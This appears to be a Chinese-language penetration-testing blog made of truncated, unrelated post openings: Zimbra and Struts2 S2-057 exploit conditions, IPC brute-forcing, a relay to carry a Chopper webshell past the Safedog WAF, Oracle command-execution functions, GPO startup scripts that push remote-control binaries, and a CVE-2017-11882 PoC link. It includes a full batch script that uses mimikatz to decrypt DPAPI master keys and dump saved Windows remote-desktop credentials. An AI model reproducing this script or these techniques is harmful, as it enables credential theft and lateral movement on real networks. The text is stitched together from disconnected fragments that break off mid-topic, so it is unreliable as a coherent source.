¶环境搭建

我就不搭建了，其实我按照作者给的搭建过程也没搭建成功，我直接使用一个现成环境测试。

¶利用条件

需要获取到3个变量

zmImap:[accountId]:[folderNo]:[modseq]:[uidvalidity]

¶0x01 前言

在内网环境中，掌握一些密码后，最基础，最有效获取服务器权限的方式即ipc暴破

关于ipc暴破，这类工具在网上见的不多。目前工作中见到的有直接开无数个cmd的伪bat，还有身边同事powershell写的ps1，powershell是挺好用的，但有个关键问题是目标机器必须是win7及以上，遇到老机器当然是没法用了。

因此，bat无疑是首选，因其语言较底层，不够高级，写起来比较吃力

花了几天时间改了几个版本，解决了密码特殊字符，菜刀判断进程等各种问题，更新日志在update.txt，应用在自己的实战中。

¶前言

Struts2又出漏洞了，上一波的045好用到不行，复现参考https://github.com/jas502n/St2-057

写这篇文章时，vulhub还没有057的漏洞环境

当Struts2的配置满足以下条件时：

• alwaysSelectFullNamespace值为true
• action元素未设置namespace属性，或使用了通配符

namespace将由用户从uri传入，并作为OGNL表达式计算，最终造成任意命令执行漏洞。

影响版本: 小于等于 Struts 2.3.34 与 Struts 2.5.16

看这个条件就知道没那么好利用

前言

若服务器安装了安全狗，普通一句话安全狗肯定拦截，菜刀必然无法使用。

究其原因：菜刀请求关键字等被安全狗识别导致中断请求。

构造本地中转脚本，本地服务器发送请求，对菜刀请求关键字进行编码，服务端再对请求解码，这样安全狗无法识别也就无法拦截请求。

客户端

客户端即中转脚本transfer.php

客户端对菜刀请求参数进行编码操作，此处仅做简单编码验证bypass，编码顺序依次为

0x01 Oracle安装

CentOS 7 安装oracle10g，装了一天，特此记录

oracle9i,10G,11G,各版本下载资源

Centos6/7下静默安装oracle10g

0x02 命令执行

本文测试环境均为：

CentOS Linux release 7.2.1511 (Core)

Oracle Database 10g Enterprise Edition Release 10.2.0.1.0 - 64bit Production

执行方式很多种，这边只研究Oracle10g，并且本地实测成功的

• DBMS_EXPORT_EXTENSION()
• dbms_xmlquery.newcontext()
• DBMS_JAVA_TEST.FUNCALL()

前言

旧笔记本淘汰了，卖掉可惜，扔了更可惜，平时经常有破解wifi的需要，干脆把它做成双系统，win+linux两不误，由于我的华硕是UEFI+GPT，导致我双系统怎么都装不成功，由此开启了我崎岖的踩坑路。

UEFI

先恶补一波BIOS，MBR，UEFI，GPT

还没弄明白BIOS+MBR和UEFI+GPT？看这一篇讲解就足够了！

EFI、UEFI、MBR、GPT的区别

UEFI+GPT与BIOS+MBR各自有什么优缺点？

看了这些应该有了一定的认识，一般组合为：

• UEFI + GPT
• BIOS + MBR

我2012年买的华硕，已经默认是UEFI+GPT，当时还因为这个原因导致无法重装系统，现在装双系统，又碰到该问题，简直头皮发麻，不管怎么说，目的得先达到——安装双系统win+kali2.0。

步骤

Bypass @

如图，遇到@，导致注入失败，使用mysql表名即可绕过

Bypass WAF

0x01 背景

内网渗透中，当控制到域控时，当然是再好不过，但如何控制成员机器或个人机呢，域管理员账号登录？太敏感，动作大；psexec,wmi…?杀软报毒，不要不信，亲身经历；

想要直接推送个远控，神不知鬼不觉的搞定成员；

那么问题来了，如何推送个exe？

0x02 研究

¶方法1

查找大量相关资料，都没有现成的方法直接下发exe，然而吐司竟然也没有，最后，锁定了组策略开机脚本

域成员登录时，执行域控提前部署好的bat脚本，通过此脚本，IPC连接到域控，copy文件，在成员上执行。

前言

【奇技淫巧】破解远程终端凭据，获取服务器密码

想必大家都看了这篇文章吧，土司12月推送的，非常好的破解方式，内网中能起到相当大的作用，相信不少人已经去实践了一遍，过程之繁琐真是让我们这些人望而却步。

我可不想每拿到一台内网机，都要重复的去做这么复杂的操作，而且每一个凭据都要做一遍。

对批处理不熟，花了几天时间，写了个bat，一键批量获取。

Code

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46

@echo off
setlocal enabledelayedexpansion

echo.
echo [+] Start. Code by redn3ck.
echo.

set flag=0	REM 判断是否存在Credentials
for /f %%i in ('dir /a/s/b c:\Users\Administrator\AppData\Local\Microsoft\Credentials') do (
	if exist %%i (
		set file=%%i
		set flag=1
		echo !file!

		for /f "delims=: tokens=1,2" %%i in ('mimikatz.exe "dpapi::cred /in:!file!" "exit" ^| findstr guidMasterKey') do set guidMasterKey=%%j
		REM echo !guidMasterKey!

		mimikatz "privilege::debug" "sekurlsa::dpapi" "exit" > MasterKey.txt
			
		REM findstr /n 返回行号 example: 1:       * GUID      :  {b619a08d-f4c3-408d-b733-bc89bd94ca0b}
		for /f "delims=:" %%i in ('findstr /n "!guidMasterKey!" MasterKey.txt') do (
		set /a lineNum=%%i+1
		REM echo !lineNum!
		call :next
		)
	)
)
:end
if !flag!==0 echo [-] No credentials :(
echo.
echo [+] End
exit /b	

:next
for /f "skip=%lineNum% delims=" %%i in ('type MasterKey.txt') do (
set MasterKeyTemp=%%i
goto next2
)

:next2
set MasterKey=%MasterKeyTemp:~16%
REM echo %MasterKey%
mimikatz "dpapi::cred /in:%file% /masterkey:%MasterKey%" "exit" > pass.txt
findstr "TargetName UserName CredentialBlob" pass.txt
del MasterKey.txt

POC

https://github.com/embedi/CVE-2017-11882

如何使用，作者github里写的很清楚

附上自测gif

BTW

现在此漏洞被冠上全版本通杀的名号，作者也放出3个版本的视频，但我本地测试，却在2016下未成功

具体环境：win10 [10.0.16299.64] + 破解激活过的office2016